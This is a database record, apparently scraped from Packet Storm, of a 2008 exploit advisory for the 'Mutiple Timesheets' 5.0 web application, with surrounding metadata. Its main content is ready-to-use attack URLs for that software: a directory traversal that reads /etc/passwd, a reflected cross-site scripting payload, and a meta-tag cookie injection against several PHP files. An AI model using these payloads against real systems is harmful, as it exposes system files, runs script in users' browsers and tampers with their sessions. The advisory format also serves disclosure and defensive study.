{"sourceHref": "https://packetstormsecurity.com/files/download/64611/timesheets-multi.txt", "sourceData": "`--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- \n--==+ Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities +==-- \n--==+====================================================================================+==-- \n[+] [JosS] + [Spanish Hackers Team] + [Sys - Project] \n \n[+] Info: \n \n[~] Software: Mutiple Timesheets \n[~] Download: http://riceball.com/drupal/files/mts-5.zip \n[~] Exploit: Multiple Remote Vulnerabilities [High] \n[~] Bug Found By: JosS \n[~] Contact: sys-project[at]hotmail.com \n[~] Web: http://www.spanish-hackers.com \n[~] Good! \n \n[+] Directory traversal: \n \n[~] Vuln File: index.php \n[~] Exploit: http://localhost/PATH/?tab=[FILE] \n[~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd \n \n[+] Cross Site Scripting: \n \n[~] Vuln File: index.php \n[~] Exploit: http://localhost/PATH/?tab=[XSS] \n[~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert(\"JosS\")%3B</ScRiPt> \n \n[+] Cookie Manipulation: \n \n[~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php \n[~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie] \n[~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'> \n \n \n--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- \n--==+ JosS +==-- \n--==+====================================================================================+==-- \n[+] [The End] \n \n \n`\n", "edition": 1, "references": [], "modified": "2008-03-17T00:00:00", "hash": "54b41618fad9882bdaf9acb7fe9d09bbdbfabbcb09cf102eb00aeb173a29e749", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/64611/timesheets-multi.txt.html", "description": "", "id": "PACKETSTORM:64611", "reporter": "JosS", "lastseen": "2016-11-03T10:21:30", "published": "2008-03-17T00:00:00", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:21:30", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:30", "rev": 2}, "vulnersScore": -0.4}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "timesheets-multi.txt", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "3e64df5ecdbf7f7ce5da6629a1fd012c", "key": "href"}, {"hash": "58b56ee8fef552ffe3825f2d0a3a0bec", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "58b56ee8fef552ffe3825f2d0a3a0bec", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5c2648ca3be762bd6634a11332c369cf", "key": "reporter"}, {"hash": "c37c6c4c91f830f978d7d34358964cf1", "key": "sourceData"}, {"hash": "34467df5326a46f90678a14e6ac97261", "key": "sourceHref"}, {"hash": "cc264d0f633ad0d32d35cb1fa02fd06a", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}

{}